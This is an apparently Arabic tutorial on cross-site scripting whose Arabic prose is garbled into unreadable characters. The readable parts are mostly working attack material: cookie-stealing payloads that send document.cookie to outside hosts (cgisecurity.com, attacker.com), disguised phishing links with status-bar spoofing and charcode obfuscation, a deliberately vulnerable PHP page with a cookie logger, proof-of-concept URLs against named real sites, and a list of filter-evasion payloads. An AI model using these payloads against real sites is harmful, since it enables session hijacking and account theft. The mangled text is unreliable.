
AlQuRsAn Cross Site Scripting www.sfh.com/vb

!" # $ %&' " ( )* +


;/ <) / 0 1 2 $ '/0( , 3 456 7- " 89 0 2 :. !" ( , -
.=0> ? ( , + 2 @ <1 ? A0 B C
> G .. #@ > + CSS 2 JK. D E FG )* + H I DE F )* +
.;O + " N @ L M$ $? ? 7
.= -Y Z[ " CSS 4 P #O /Q R 0 SO$ TP U )V WX

CSS
2 )-_ 1 2 $ '/0( $0 > ^]XSS Z[ " \Cross Site Scripting
a W b c d '0OG /3 1 * e )- #@ 2 + . ` '6 @ I ( , +
<"U " 6j)* i WX iJ[ ( , + fWg h 3 ^=6 ` '6 @ !
.Z$?G WX k * lfWm T 3 B ! ... 6 @ 3O "
] 6jn c0 "\HEX f )* + e ` 'Q @ I E ;8> n c0 - ( $ o ,+ #@
. $ ( , + =< t u' v *" s I s" 1 / =lp qr+
!7)/ >O6 & e 2 ycl" s I01 2 $ '/0 /3 x8! I x 2 l ' )w
.@ I iJR W &[ 2 & uWX z< t s"

XSS CSS
Cascading ) L ' <| a I CSS WIX Cross Site Scripting {L Tt
q Y I . CSS WIX Z[ " { W Style Sheets
" ' 3 s~ . XSS WIX Cross Site Scripting z<nc -Y e N ,+ }
.XSS• 2 J uWX -

Cross Site TI =l<TP 0%l" XSS # JK2 > l" 4 $ ?" % € r<%l" Zr<
.• 6 Ic Scripting

XSS
" ActiveX " VBScript " Java Script @ ! ‚ O@< " $? I7 ) / n ! 4 ?" e
f ? ;Mv ! .=0 )w @ I W… ) / „... ƒ ,c Flash " HTML
„„„. I† ‡ˆ 6 3 ‰ " 8! I * 3 " =0@ <nJ0 " ( , +
‹Š )* + XSS o ,+ Z | , + # m 'Q @ !p
http://archives.neohapsis.com/archives/vuln- -
o 6Œ I† xDenial Of Servicex• 0 # m d$ [a )* + WX
.& $ + 3 " * ˆ ' ( , + r<)* - M•$

'XSS ! "#$%&
A + WX .PHPNuke X O Pc+ PHP A l e s I0XSS 2 JK #?
.A + WX ' c „.. I† ? %* e N V P + -Ž s I
‹A + W7 0)* + 2 ˆ '0OŒ } uWX
http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt
!"##!$! %
http://www.cgisecurity.com/archive !! !"##! %
.# ? i$VA + WX /J O$0 • l)* + uWX ( $0

() " * + ,-. /#0 ) 1 2 %


$• - 0 I•2 G 6 + 2 nJ+ } ,+ 1 2 $ '/0 8! I * 3 - 0
. ,+ I7 1 3" i 4 WX E e i? ^@ !

8 92 7 3 4 56
‘ O I†s ! r< @ I Vi O $0)* + X ƒ &V<)* + e f 2 $ '/0e # J @g<
)* + M , + 8! I B o lO $l ’ Zr<.... " < 8! I ( , )* + ;8> p
.E iJR r<)* + 1 ? • Q 8! I B W6ylO $l “O WX

;-%+< : 4 56
Ic Pt0MI 1 0 } ' ‚ 2 O- 3Œ } XO- 3 ! e B ” XSS 2 JK
R h56 J Ic & Pt 3 Script 6 @@ ! 4 6@< ^s y o
& t N & - ( $ I7 1 g I IP > • s I0h 3 •P 9
P> W 0 2 J U 6" J # v " Java Script VR<‚ ’ — ^ @ Ic XO P–
. L Y )* + ;8> URL nvy0 6 @( , +
e 2 ˆ '0OŒ uWX .)* - O' 6Œ - ( $0MI [ + 2 ˆ '0OG } > 0 3"
)* + WX z<( , - 8! I B 3 0h 3 ( , + P iJ[ 3p
www.cgisecurity.com/cgi-bin/cookie.cgi
.( , + f Y 8! I W… 4 6 ) / 0s~ %l<^ PV8! I B Pt h 3

Java Script ( , 3˜ 8! I *
4
‹( 4
" š l<HEX • ™ ;8m e 1 / ASCII • 4 p ;8m e 1 / Š 4 + e
.. [V" # v ' +e @ !p

‹ ASCII ( , 3<
http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>


‹ HEX ( , 3<

. + WX › e HEX4 8 ( *Op h Y ) w n c0‚O@y3


8! I 2 )-m P , 3<) / 0 '6 Java Script @ !" ( , 3Π( 4 WX
. (5 3Œ e 8! I 4 3O< ˆ cgisecurity.com )* z<1 / 4 3O<
.)* + T3<‹ Host
.@ ! W - W nJ+ … > & ‹ a.php
.@ I W W nJ+ ‹ Variable
‹ @I
"><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>
q@ I - X
‹ & z<1 /! 8! I B 4 3O< - ( $
http://www.cgisecurity.com/cgi-bin/cookie.cgi
‹ X 8! I žO E I• 8! I B (5 3˜ ( $0uWX &
www.cgisecurity.com/articles/cookie-theft.log

? => 2 #
My cookie = user=zeno; id=
My script = www.cgisecurity.com/cgi-bin/cookie.cgi
‹Š ! )* + z<1 / 3 h 3
GET /cgi-bin/cookie.cgi?user=zeno;' id=


e , 3< j Ic @ I Pt M! @ I ;8m n c0 - ( $ s" I7 =l< l!r


qn c Ÿ B ! HEX 4+
#ntlz< c % T* )> 02 & + c %3 T*O $ 8 O " h ? " T*O !
‹ <script> -! 4
%3C = <
%73 = s
%72 = r
%69 = i
%70 = p
%74 = t
%3E = >
WIX + e <script> -! )R ) / l r<
%3C%73%72%69%70%74%3E

XSS @ A&# 4 56
Pt0MI hexf @ I n c0 ˆ $ @ !p @ ! s~ ) 0‚ %l"
hex• c+ n6p @ I )R !y0E r Ec *% @ Ic N , -
.. " U " Π6 @( , -
• ,vp • I† I N • ,vp '* WX @ I h c ! T I†
.N@
= M v n¡ - %-* E l<( , + ¢?5 E r 8! I B * 3 T 4+e
Ic )* + 8! I B %* 3 - ( $ s ?p Tt e m I7 I
.s p u c WX ( , + '* ¢?5 n¡ ) 3


@ > @ I s ! r< " 3 V Java Script @ ! W 0


E IF ΠA }
. 3 ) V B -!
3 ) V s ! r<Java Script @ ! W - 0Hotmail #n'I )* + Tt
.8! I * 3 ) F# V - ( $0 I

, B@C D 'E 4 56
e ˆ ? %l<z<% I z< 3 0— )- 2 + ^ # J '/ ( , > % / 3< r<
Websleuth u@" ( , 0) / 08! I E F%l<s~ cookie.cgi e X E *
.( , + f ? B /6 s I Πs ! r<U
.. X 8! I * 3 I # + @g<E I•
http://www.idefense.com/XSS.html

>AF G )EH IJ
@ !p n c0 )R e A O " 'l
‹ z p # /Q
<html>
<head>
<title>Look at this!</title>
</head>
<body>
<a href="http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<script>document.location.replace('http://attacker.com/steal.cgi?'+document.cookie);</script>"> Check this CNN story out! </a>
</body>
</html>
. <a> T3 % d '0O˜! & e @I R X


- nJ & uWX e s I index3a_page2.html & ( $ q@ I -


.8! I B 1 & ( $0U 6" z< & 4 a @ ! )[lnJ+ ( " X tw X @ I W

‹ l # /Q
q Y ... U 6" & z<=P> ( $ 3 =lp F V cI s I0 $ # /Q
<html>
<head>
<title>Look at this!</title>
</head>
<body>
<a href="http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<script>document.location.replace('http://attacker.com/steal.cgi?'+document.cookie);</script>"
onMouseOver="window.status='http://www.cnn.com/2002/SHOWBIZ/News/05/02/clinton.talkshow.reut/index.html';return true"
onMouseOut="window.status='';return true"> Check this CNN story out!
</a>
</body>
</html>
‹ MX @ I / 2 5 0 R"
onMouseOver="window.status='http://www.cnn.com/2002/SHOWBIZ/News/05/02/clinton.talkshow.reut/index.html';return true"
onMouseOut="window.status='';return true"
. /+ & v '+ & T i $

‹ # /Q
...= " # X– 2 5 & !U & @ ! z< t ( , + I† Ic > 0 [ " X
<html>
<head>
<title>Look at this!</title>
</head>
<body>
<a href="http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<script>var u = String.fromCharCode(0x0068);
u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0070);
u %2B= String.fromCharCode(0x003A);
u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x0061);
u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0061);
u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x006B);
u %2B= String.fromCharCode(0x0065);
u %2B= String.fromCharCode(0x0072);
u %2B= String.fromCharCode(0x002E);
u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x006F);
u %2B= String.fromCharCode(0x006D);
u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x0068);
u %2B= String.fromCharCode(0x0061);
u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x006B);
u %2B= String.fromCharCode(0x002E);
u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x0067);
u %2B= String.fromCharCode(0x0069);
u %2B= String.fromCharCode(0x003F);
u %2B= document.cookie;
document.location.replace(u);</script>"
onMouseOver="window.status='http://www.cnn.com/2002/SHOWBIZ/News/05/02/clinton.talkshow.reut/index.html';return true"
onMouseOut="window.status='';return true"> Check this CNN story out!
</a>
</body>
</html>
‹ R
h Y @ !" nJ+ WX e R u €<=6 nJ V <script> R tw nJ+
• l I+
http://attacker.com/hack.cgi?'+document.cookie;
.h ? h ?
http
0x0068 = h
0x0074 = t
0x0074 = t
0x0070 = p
0x003A = :
0x002F = /
e u -$ R E r
document.location.replace(u);
.@ I )' 0 @ ƒ ,c 1 `•

KDL 4 B@ M /+
.... )R @ ! " '$0` • 2 nJ- # V - ( X1 '
‹4
xss.php P- l@ ! " W nJ php J & - ( $l
http://localhost/xss.php

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
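<?
// Deliberately vulnerable demo page: the "code" parameter is echoed back unescaped.
// The original relied on register_globals to populate $code; it is read from $_GET here.
$code = isset($_GET['code']) ? $_GET['code'] : null;
if ( isset($code) )
    echo stripslashes($code);

echo "<form method='get'><input type='text' name='code'><input type='submit'></form>";
?>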
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
res.php P- l8! ! ¥c 0 &
http://localhost/res.php
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
<?
// Set a test cookie that expires in one hour.
setcookie("myname", "alqursan", time() + 3600);

?>
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
cookies.php P- l8! I B T 0 &
http://localhost/cookies.php
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
<?
$data=$HTTP_COOKIE;
$fp = fopen("log.htm","a");
flock ($fp,2);
fputs ($fp,"<BR>$data");
flock($fp,3);
fclose($fp);

?>
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

log.htm - lM>O6 B e 8! I 9 0 - & uWX ( $0


http://localhost/log.htm

‹2 /Q
‹Š Ž z< $ 2 & |5 - ¦§P> e Mc0 " Vn3 E sI sd c
C:\apache\htdocs
..php T W E * z<2 + uWX )VO "
8! ! )R ‹ z p # /Q
.. & V<
http://localhost/res.php

.. & —
http://localhost/xss.php
) + e Š @ I 6@"
<script>document.location='http://localhost/cookies.php?'+document.cookie</script>
‹ & @ < T3< Š 1 !< "
?word=<script>document.location='http://localhost/cookies.php?'+document.cookie</script>

8! I B 9 ( $0 XO & uWX cookies.php z <8! I B 4 3O<T X


‹ & V<8! I B ž log.htm & uWX e
http://localhost/log.htm
q# J uWX -Y T0B ! I # I R 0%Fs~
R ’ xss.php & ei Y
stripslashes($code);
)[l l
addslashes($code);
4 Y f >... z p h W• 6j ? Z[ "
... & T- s I y/Q s< W! TP l

9N/) = A:= E0 )
s I 3 Z' ¡ ›p E #@ > + @ !¨ # V - T* ( , ><uWX y 0G /
. XSS
I† .¦ R P- 3< ?" r<E - " r©0 * XSS 2 JK !W0. &gt &lt z<> < n¡
.s B Ic E * 6 ‰ 0 E • § ” E W L # J uWX c I7
&<0 z<] \Z[ " Š # VE 1 g XSS ! c+ ! > < # V
. 1 0 &< 2 &< $ z<ª & Z[ " &<0

O P% -) = A:= E0 )
)* + = iJ[ @ + d '0OG )' 0i$VE lM- s" Z > P3 @ ( , % ! r<
e i WX I T* asfh.com «5 )* z<i O=V2 > )* 2 O§ r<. M •
. Ic+ uWX ® ¬- a h 3 WX & e i iJ[ s @E &
.E <e V + B + " E <%& V%l" r<# v ' W 0h 3 XSS Zl ?"
.= $ ;Mv " e 05V ' G ƒ ,v " V 0G ƒ ,v 3O %- 3 %l" r<
U )R .E & 2 @ < Java Script ¡" /Q WX E l -Y U 6" $ ˆ
. 0;Mv " ( Ic WX .8! I B %* 3 ) • WX high E & e -Y

XSS !Q .R 0 )
. #n'I )* + e @ > ( , 3Œ P3 ›p § I7 N 3 # Pv %' !<XSS 2 JK
.. n ! )* ¦ X
FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft,
Zdnet, Wired, and Newsbytes
Pv ! #nPc 2 9 + e > 0. XSS 2 JK4 Iv" Iv )* + uWX !
)* ) 0x XO- 3 $ / ‘ v 7#Oc 3 clT XSS # JK°±¤¯- Z' $0
.x²O I

-U SSL SAT% D
)* + ^i$VT )* + 1 ˆ !y )* + } e s I *@ + 4 ! 0 WX ZG "
.4 ! 0 ³ WX ( , 0G )* + P ´ 80G SSL ( , 0
^ c+ 4 0G e s I+ H lW6y o ,+ ^ e -! ;Mc H l - 01 2 $ '/0


WX I . j ( Mv ! s" TP& 3" @ > + $ Xc [ L


. h 5J i$V

XSS 4 ! 5+ EV /5#9 5%+ED


e Q - 3 I7 r<.@ • '/0 IF ^Java Script @ ! ‚ O@˜ - 0XSS # JK
.i$Vx( , + x + P> " W ) / X Zr< I† p '/0s ! +
e s I0s" I• U 6" 2 JK# + P , 3 ) / 0 XSS 2 J i O @e
. +

XSS 4 !WXY Z O *E[ :E \] U


e ` '6 @ ! )[ l" f ? E •( , p s I Œ s I # J uWX ‘5 <(
. " VRΠE *
.)3 Ic 2 c l< * s I0 Y #n'I )* + µv e X h 3 XSS
c0 O R 1 ' WX I† E ! v /6 Ic WX X cl PVc ! =I• ƒ ,v
$ 0E W E •5- $K¦ $ * WX E •5- z< •3O 3 I•Z[ " E ! v % -
.E TP 0

_4 NA, " ` *a IE 4 ^ bc _ 4( ^ !

+ 51 ' ,= + 5 > 3 ? 3t.cookies)


</script>"></iframe•
Zorum version 0 A e # JK
http://www."any site".com/pathofzorum/index.php?method=<script>alert('test')</script>

http://www.microsoft.com/education/?ID=MCTN&target=http://www.microsoft.com/education/?ID=MCTN&target="><script>alert(document.cookie)</script>

+ 3 2 3 % ! * ,5
ript>alert(‘Test’);</script>

http://www.shopnbc.com/listing.asp?qu=<script>alert(document.cookie)</
>@1 ,0@ , @ ,AABA@ , @ , @C ,

http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text"><script>alert"document.cookie</script>

>AF -F # &. A# . &% O + O P%+Z , E


<a href="javas&#99;ript&#35;[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]">
<input type="image" dynsrc="javascript:[code]">
<bgsound src="javascript:[code]">
&<script>[code]</script>
&{[code]};
<img src=&{[code]};>
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]">
<img src="mocha:[code]">
<img src="livescript:[code]">
<a href="about:<s&#99;ript>[code]</script>">
<meta http-equiv="refresh"
content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image:
url(javascript:[code]);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression([code]);">


<style type="text/javascript">[code]</style>
<object classid="clsid:..."
codebase="javascript:[code]">
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml
id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a
></xml>
<div datafld="b" dataformatas="html"
datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script>
5 >D## is behind 5 >

‹ 4 # 0 W @ I [ code ] 4 ' 3< '3 !e

<script>[code]</script>
‹ Xn¡ " @ !p ?y = ' 3<T
document.write(document.cookies)

alert('alqursan');

document.location='http://site/cookie.php*4
' ( 3
.# J H l Jc0( 3 '3 ! Zˆ v H
6 @s I0¶ i Oe #@ > s I0 I•G 2 & @ !" 6 @W 0@ !p WX }
.i$V2 & @ !"


? H G )3 %) H S ) ) A% HEX ( %8 L d , ^

Hex   Char    Hex   Char
%50   P       %20   (space)
%51   Q       %21   !
%52   R       %22   "
%53   S       %23   #
%54   T       %24   $
%55   U       %25   %
%56   V       %26   &
%57   W       %28   (
%58   X       %29   )
%59   Y       %2A   *
%5A   Z       %2B   +
%5B   [       %2C   ,
%5C   \       %2D   -
%5D   ]       %2E   .
%5E   ^       %2F   /
%5F   _       %30   0
%60   `       %31   1
%61   a       %32   2
%62   b       %33   3
%63   c       %34   4
%64   d       %35   5
%65   e       %36   6
%66   f       %37   7
%67   g       %38   8
%68   h       %39   9
%69   i       %3A   :
%6A   j       %3B   ;
%6B   k       %3C   <
%6C   l       %3D   =
%6D   m       %3E   >
%6E   n       %3F   ?
%6F   o       %40   @
%70   p       %41   A
%71   q       %42   B
%72   r       %43   C
%73   s       %44   D
%74   t       %45   E
%75   u       %46   F
%76   v       %47   G
%77   w       %48   H
%78   x       %49   I
%79   y       %4A   J
%7A   z       %4B   K
%7B   {       %4C   L
%7C   |       %4D   M
%7D   }       %4E   N
%7E   ~       %4F   O

e 2 @ f,. eXg< 4G ( b \e ^ "`9*


http://www.usatoday.com/life/cyber/tech/ - 2- -hotmail-security-
side.htm
http://www.perl.com/pub/a/ /css.html
http://www.cert.org/advisories/CA- - .html
http://www.cert.org/tech_tips/cgi_metacharacters.html
http://eyeonsecurity.net/papers/passporthijack.html
http://www.eccentrix.com/education/b iler/tutorials/javascript.htm#cookies


9^
"The Cross Site Scripting FAQ", www.cgisecurity.com/articles/xss-faq.txt, admin@cgisecurity.com

David Endler, The Evolution of Cross-Site Scripting Attacks, dendler@idefense.com

BrainRawt, Cross-Site Scripting Explained, brainrawt@hotmail.com

Silent Needle, secure PHP from XSS & SQL Injection, silentneedle@hotmail.com

-h i
T Ÿ" #5 [V" =j -• l 3 · T " · WX
; ¹ l 0G N - + ) w + W… ) s" ¸ I · 4y3"

s $ 1 : T! 6"
‹ Š s z< 3O" t?5+ " O 3º
Alqursan_ @hotmail.com
1 0I – • o $Y ) w
